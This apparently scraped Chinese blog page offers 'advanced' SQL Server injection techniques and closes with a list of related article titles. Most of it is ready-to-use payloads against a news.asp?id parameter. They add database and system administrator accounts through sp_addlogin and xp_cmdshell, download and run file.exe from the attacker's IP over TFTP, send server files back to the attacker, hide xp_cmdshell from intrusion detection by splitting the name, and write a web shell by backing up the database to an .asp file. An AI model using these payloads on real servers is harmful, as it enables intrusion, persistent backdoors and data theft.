确定能注入后的SQLSERVER高级注入技巧
来源:互联网 发布:手机淘宝卡顿 编辑:程序博客网 时间:2024/06/09 20:12
获取全部数据库名]
select name from master.dbo.sysdatabases where dbid=7 //dbid的值为7以上都是用户数据库
[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]
select top 1 name from 数据库名.dbo.sysobjects where xtype=@#u@# and status>0 and name not in(@#table@#)
[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
select top 1 数据库名.dbo.col_name(object_id(@#要查询的数据表名@#),字段列如:1) [ where 条件]
通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]
news.asp?id=2;exec master.dbo.sp_addlogin test,test;-- //添加数据库用户用户test,密码为test
news.asp?id=2;exec master.dbo.sp_password test,123456,test;-- //如果想改密码,则用这句(将test的密码改为123456)
news.asp?id=2;exec master.dbo.sp_addsrvrolemember test,sysadmin;-- //将test加到sysadmin组,这个组的成员可执行任何操作
news.asp?id=2;exec master.dbo.xp_cmdshell @#net user test test /add@#;-- //添加系统用户test,密码为test
news.asp?id=2;exec master.dbo.xp_cmdshell @#net localgroup administrators test /add@#;-- //将系统用户test提升为管理员
这样,你在他的数据库和系统内都留下了test管理员账号了
下面是如何从你的服器下载文件file.exe后运行它[前提是你必须将你的电脑设为TFTP服务器,将69端口打开]
id=2; exec master.dbo.xp_cmdshell @#tftp –i 你的IP get file.exe@#;--
然后运行这个文件:
id=2; exec master.dbo.xp_cmdshell @#file.exe@#;--
下载服务器的文件file2.doc到本地TFTP服务器[文件必须存在]:
id=2; exec master.dbo.xp_cmdshell @#tftp –i 你的IP Put file2.doc@#;--
绕过IDS的检测[使用变量]
declare @a sysname set @a=@#xp_@# @#cmdshell@# exec @a @#dir c:/@#
declare @a sysname set @a=@#xp@# @#_cm@# @#dshell@# exec @a @#dir c:/@#
新加的:
建一个表。只有一个字段,类型为image,将asp内容写入。导出数据库为文件
backup database dbname to disk=@#d:/web/db.asp@#;
报错得到系统操作系统和数据库系统版本号
id=2 and 1<>(select @@VERSION);
- 确定能注入后的SQLSERVER高级注入技巧
- SQLSERVER高级注入技巧
- SQLSERVER高级注入技巧
- SQLSERVER高级注入技巧
- SQLSERVER高级注入技巧
- SQLSERVER高级注入技巧
- SQLSERVER高级注入技巧
- 桂林老兵的SQLSERVER高级注入技巧
- 桂林老兵的SQLSERVER高级注入技巧
- 桂林老兵的SQLSERVER高级注入技巧
- 桂林老兵的SQLSERVER高级注入技巧
- 桂林老兵的SQLSERVER高级注入技巧(摘)
- SQLServer注入技巧
- SQLServer应用程序中的高级SQL注入
- SQL注入高级技巧nowthk篇
- SQL注入高级技巧nowthk篇
- 介绍SQL手工注入高级技巧
- SQL注入的新技巧
- 一个时间字体显示样式
- 剖析网站遭遇的入侵 分析黑客入侵方法
- c#传递值类型(value-type)
- apache下单独新增编译模块的方法
- FORM表单重复提交问题解决方法
- 确定能注入后的SQLSERVER高级注入技巧
- 一个不错的C#验证码程序
- 使用RealViewMDK时常见的问题(1)
- Flex RemoteObject 简单应用Demo
- 视频教程
- C#图片+水印(透明)函数
- 如何得到当前进程的句柄
- 获取指定URL网页的HTML代码
- 三种地理参考信息模型:WMS,WFS,WCS
